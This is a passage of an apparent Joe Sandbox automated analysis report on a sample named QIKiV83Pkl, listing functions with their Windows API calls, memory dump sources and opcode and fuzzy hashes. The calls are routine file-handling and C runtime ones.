                • GetLastError.KERNEL32(?,0089A49B,0087CFE0,00000000,00000000,00000000,?,0089A698,00000006,FlsSetValue,008A7348,008A7350,00000000,00000364,?,00899077), ref: 0089A532
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0089A49B,0087CFE0,00000000,00000000,00000000,?,0089A698,00000006,FlsSetValue,008A7348,008A7350,00000000), ref: 0089A540
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID:
                • API String ID: 3177248105-0
                • Opcode ID: c4bd4081f3b9240fbf4e61b1ebbcbfa568c688861dd9d7c6bc29241a166e9191
                • Instruction ID: 02b53402a496d2a7da5963c3e0e0992d30b92a503966b392a80f29aaa929aef6
                • Opcode Fuzzy Hash: c4bd4081f3b9240fbf4e61b1ebbcbfa568c688861dd9d7c6bc29241a166e9191
                • Instruction Fuzzy Hash: E0012B32711626ABDF25ABE89C44A67BB9CFF46BA172A0621F906D3140D731D900C6E1
                Function 00879F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                Download Yara Rule
                APIs
                • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0087CC94,00000001,?,?,?,00000000,00884ECD,?,?,?), ref: 00879F4C
                • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00884ECD,?,?,?,?,?,00884972,?), ref: 00879F8E
                • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0087CC94,00000001,?,?), ref: 00879FB8
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: FileWrite$Handle
                • String ID:
                • API String ID: 4209713984-0
                • Opcode ID: 54d4a5f6f9e606aa14c1ea54ca581a6f152e0d28d89eb18af75d808d43c44b4a
                • Instruction ID: a6f5c9ed8b8fc6e969a31c3d2534562dde6bcab735f66098cc02691d3c82595a
                • Opcode Fuzzy Hash: 54d4a5f6f9e606aa14c1ea54ca581a6f152e0d28d89eb18af75d808d43c44b4a
                • Instruction Fuzzy Hash: EC31E271208705DBDF148F24D848B6ABBA8FB91711F04895DF98DDA289CB74D948CBB2
                Function 0087A207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                Download Yara Rule
                APIs
                • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0087A113,?,00000001,00000000,?,?), ref: 0087A22E
                • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0087A113,?,00000001,00000000,?,?), ref: 0087A261
                • GetLastError.KERNEL32(?,?,?,?,0087A113,?,00000001,00000000,?,?), ref: 0087A27E
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: CreateDirectory$ErrorLast
                • String ID:
                • API String ID: 2485089472-0
                • Opcode ID: 80fcf414401e69fda72ac55cc77e8a1b391b10f077782394164984e52841d45f
                • Instruction ID: f337be8f6d0b625b7b940eb8545f67a287aad3578a11b677c09931e122e9d4a0
                • Opcode Fuzzy Hash: 80fcf414401e69fda72ac55cc77e8a1b391b10f077782394164984e52841d45f
                • Instruction Fuzzy Hash: 2101F931160518A5EB3A9B784C05BED334DFF57741F08C451F90DE605ACB66CA80C677
                Function 0089AFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                Download Yara Rule
                APIs
                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0089B019
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Info
                • String ID:
                • API String ID: 1807457897-3916222277
                • Opcode ID: f1a4b62685c64c71c163d517497c283de24cede743d02293d0f5a17b39f537f9
                • Instruction ID: 9a204e9b85812d3f6f12fb611309d5214f52255ab413f02de3ce80c79192a212
                • Opcode Fuzzy Hash: f1a4b62685c64c71c163d517497c283de24cede743d02293d0f5a17b39f537f9
                • Instruction Fuzzy Hash: 4D41257050438C9EDF229A289D94AEABBA9FB45308F1804ECE59AC7142D335AA45CF20
                Function 0089A72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 0089A79D
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: String
                • String ID: LCMapStringEx
                • API String ID: 2568140703-3893581201
                • Opcode ID: f90a0af0cc641dd2fc2bb1ecd1adf2a8648c7f005f67b0ac8db0d89f87257ce3
                • Instruction ID: e24172b4aec35950db9f1c1066d68dc6e7702a15b746bb28614b7613f53110c7
                • Opcode Fuzzy Hash: f90a0af0cc641dd2fc2bb1ecd1adf2a8648c7f005f67b0ac8db0d89f87257ce3
                • Instruction Fuzzy Hash: 34010232540208BBDF06AFA4DC02EEE7F66FB09714F054114FE14A5260CA368A21AB92
                Function 0089A6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                Download Yara Rule
                APIs
                • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00899D2F), ref: 0089A715
                Strings
                • InitializeCriticalSectionEx, xrefs: 0089A6E5
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: CountCriticalInitializeSectionSpin
                • String ID: InitializeCriticalSectionEx
                • API String ID: 2593887523-3084827643
                • Opcode ID: 9602937a72707077ff29a6c52ba44ac5b58b7cee2bb0743471e6595077c7b96a
                • Instruction ID: 112b392166cb48f13a632073036befad1a4a40177751aef23f8825d5e652a93d
                • Opcode Fuzzy Hash: 9602937a72707077ff29a6c52ba44ac5b58b7cee2bb0743471e6595077c7b96a
                • Instruction Fuzzy Hash: ECF0BE3164521CBBDF056F64CC06DAEBF61FF16760B444454FC199A760DB728A10EBD2
                Function 0089A56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Alloc
                • String ID: FlsAlloc
                • API String ID: 2773662609-671089009
                • Opcode ID: bd447e30bc40ed68833ba8a7ba9017ecbbf42ddfe5f774951136e505669e9d76
                • Instruction ID: 989ac9d9419d54fe25bd1e2d1f30849ebb03b4212701083ef3a3de7450cf2dd0
                • Opcode Fuzzy Hash: bd447e30bc40ed68833ba8a7ba9017ecbbf42ddfe5f774951136e505669e9d76
                • Instruction Fuzzy Hash: 4AE05530B8522C6BAA187FA48C029AEBB50FB26711B460018FC05D7740DE744E00A2DA
                Function 0089329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                Download Yara Rule
                APIs
                • try_get_function.LIBVCRUNTIME ref: 008932AF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: try_get_function
                • String ID: FlsAlloc
                • API String ID: 2742660187-671089009
                • Opcode ID: c94dc64970f07597b9a20d6e8c35befcf003a7eeb94f193133c9fa30ee78cf2a
                • Instruction ID: cc7bc7e2e634f229189541d70170b786c627d20a1bec86737abb6bafbca7ae7b
                • Opcode Fuzzy Hash: c94dc64970f07597b9a20d6e8c35befcf003a7eeb94f193133c9fa30ee78cf2a
                • Instruction Fuzzy Hash: 8DD02B227806346AE51036D46C039AE7F04FB03FF2F490152FE0CDA743A4A5458002C6
                Function 0089B350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0089AF1B: GetOEMCP.KERNEL32(00000000,?,?,0089B1A5,?), ref: 0089AF46
                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0089B1EA,?,00000000), ref: 0089B3C4
                • GetCPInfo.KERNEL32(00000000,0089B1EA,?,?,?,0089B1EA,?,00000000), ref: 0089B3D7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: CodeInfoPageValid
                • String ID:
                • API String ID: 546120528-0
                • Opcode ID: 331149e84ec3d77a39d07e0f6f6ce0f71fba17e37c8299773b269b6f2789856e
                • Instruction ID: 62daebb850c6c0a8a4abe7408db148d1312ea6482b6be816cda7d1b17b00d4db
                • Opcode Fuzzy Hash: 331149e84ec3d77a39d07e0f6f6ce0f71fba17e37c8299773b269b6f2789856e
                • Instruction Fuzzy Hash: 8B5166B0A002059EDF24AF75E9806BABBE5FF41304F1C446ED096CB653D739D541EB85
                Function 00871385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                Download Yara Rule
                APIs
                • __EH_prolog.LIBCMT ref: 00871385
                  • Part of subcall function 00876057: __EH_prolog.LIBCMT ref: 0087605C
                  • Part of subcall function 0087C827: __EH_prolog.LIBCMT ref: 0087C82C
                  • Part of subcall function 0087C827: new.LIBCMT ref: 0087C86F
                  • Part of subcall function 0087C827: new.LIBCMT ref: 0087C893
                • new.LIBCMT ref: 008713FE
                  • Part of subcall function 0087B07D: __EH_prolog.LIBCMT ref: 0087B082
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: 341c67da9b738f611ee6c506e8bcde4515851a365ebb0ca99867965490c8321b
                • Instruction ID: 76ef9b5ce2271e482465c2085daefe2397d0625be51b5ca49ee01f2a490f6741
                • Opcode Fuzzy Hash: 341c67da9b738f611ee6c506e8bcde4515851a365ebb0ca99867965490c8321b
                • Instruction Fuzzy Hash: 0A4117B0805B40DED724DF7984859E6FAE6FB18300F504A2ED6EEC3282DB326554CB16
                Function 00871380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON
                Download Yara Rule
                APIs
                • __EH_prolog.LIBCMT ref: 00871385
                  • Part of subcall function 00876057: __EH_prolog.LIBCMT ref: 0087605C
                  • Part of subcall function 0087C827: __EH_prolog.LIBCMT ref: 0087C82C
                  • Part of subcall function 0087C827: new.LIBCMT ref: 0087C86F
                  • Part of subcall function 0087C827: new.LIBCMT ref: 0087C893
                • new.LIBCMT ref: 008713FE
                  • Part of subcall function 0087B07D: __EH_prolog.LIBCMT ref: 0087B082
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: fc7319832aefabbc5cfcfa3659d21c31fede9af6cda27b86648bcfd1beda7ae8
                • Instruction ID: f51a56c99e4181640ec02e2d477d6b5287557fe904280f2066cb31d05d8fff16
                • Opcode Fuzzy Hash: fc7319832aefabbc5cfcfa3659d21c31fede9af6cda27b86648bcfd1beda7ae8
                • Instruction Fuzzy Hash: 4D4118B0805B409EE724DF7984859E7FAE5FF18300F504A2ED2EEC3282DB326554CB16
                Function 0089B188 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 00898FA5: GetLastError.KERNEL32(?,008B0EE8,00893E14,008B0EE8,?,?,00893713,00000050,?,008B0EE8,00000200), ref: 00898FA9
                  • Part of subcall function 00898FA5: _free.LIBCMT ref: 00898FDC
                  • Part of subcall function 00898FA5: SetLastError.KERNEL32(00000000,?,008B0EE8,00000200), ref: 0089901D
                  • Part of subcall function 00898FA5: _abort.LIBCMT ref: 00899023
                  • Part of subcall function 0089B2AE: _abort.LIBCMT ref: 0089B2E0
                  • Part of subcall function 0089B2AE: _free.LIBCMT ref: 0089B314
                  • Part of subcall function 0089AF1B: GetOEMCP.KERNEL32(00000000,?,?,0089B1A5,?), ref: 0089AF46
                • _free.LIBCMT ref: 0089B200
                • _free.LIBCMT ref: 0089B236
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: _free$ErrorLast_abort
                • String ID:
                • API String ID: 2991157371-0
                • Opcode ID: f9443e5e200fa0c144c77ab8169d419f853c1b1224de6f943a57f6d1f510a226
                • Instruction ID: abba0e696b12d54b1bf003c5c8d1409b07b4b95db440b4b00bfac05cab2c42aa
                • Opcode Fuzzy Hash: f9443e5e200fa0c144c77ab8169d419f853c1b1224de6f943a57f6d1f510a226
                • Instruction Fuzzy Hash: 6531C231904209AFDF10FFADE941AADB7E5FF42320F2940A9E814DB291EB719D41CB51
                Function 0087971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00879EDC,?,?,00877867), ref: 008797A6
                • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00879EDC,?,?,00877867), ref: 008797DB
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: dd8ef03c9b6c58a2f71e3d770873f211d940d468421c4703c059eb2629b0621c
                • Instruction ID: 81714ae1387d278a4a894ae560c5592f12cffa7f6f42d111de82c4781e6a3885
                • Opcode Fuzzy Hash: dd8ef03c9b6c58a2f71e3d770873f211d940d468421c4703c059eb2629b0621c
                • Instruction Fuzzy Hash: B721E6B1110748AEE7348F64C886BA777E8FB497A4F00891DF5D9C21A1C374EC449B61
                Function 00879D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                Download Yara Rule
                APIs
                • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00877547,?,?,?,?), ref: 00879D7C
                • SetFileTime.KERNELBASE(?,?,?,?), ref: 00879E2C
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: File$BuffersFlushTime
                • String ID:
                • API String ID: 1392018926-0
                • Opcode ID: e3d092c63dca8d3f03fd099ca3d28ff884be369c4b892bf91e6362d0cb682453
                • Instruction ID: 144b4a28699eb2420f23c748416bb161752db023d0d342af7827d0e4ec4cd0bc
                • Opcode Fuzzy Hash: e3d092c63dca8d3f03fd099ca3d28ff884be369c4b892bf91e6362d0cb682453
                • Instruction Fuzzy Hash: 8F21B431148286ABC724DE24C491EAABFE4FF56708F04881DF8D5C7555D329DA0CDB51
                Function 0089A458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetProcAddress.KERNEL32(00000000,008A3958), ref: 0089A4B8
                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0089A4C5
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AddressProc__crt_fast_encode_pointer
                • String ID:
                • API String ID: 2279764990-0
                • Opcode ID: a124b964d64f079a5dab469eb6a0777febb7e0dc4b24d65c6d5166de9e360aea
                • Instruction ID: 4c1c48ade90cf8a3f49b489bbb9a0c54974f1b203b5d7586096e57deff563302
                • Opcode Fuzzy Hash: a124b964d64f079a5dab469eb6a0777febb7e0dc4b24d65c6d5166de9e360aea
                • Instruction Fuzzy Hash: 4C110633A012259BAF2EAE2CEC4486A7395FB8132471E4620FD15EB644EB70EC41C7D6
                Function 00879B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                Download Yara Rule
                APIs
                • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00879B35,?,?,00000000,?,?,00878D9C,?), ref: 00879BC0
                • GetLastError.KERNEL32 ref: 00879BCD
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
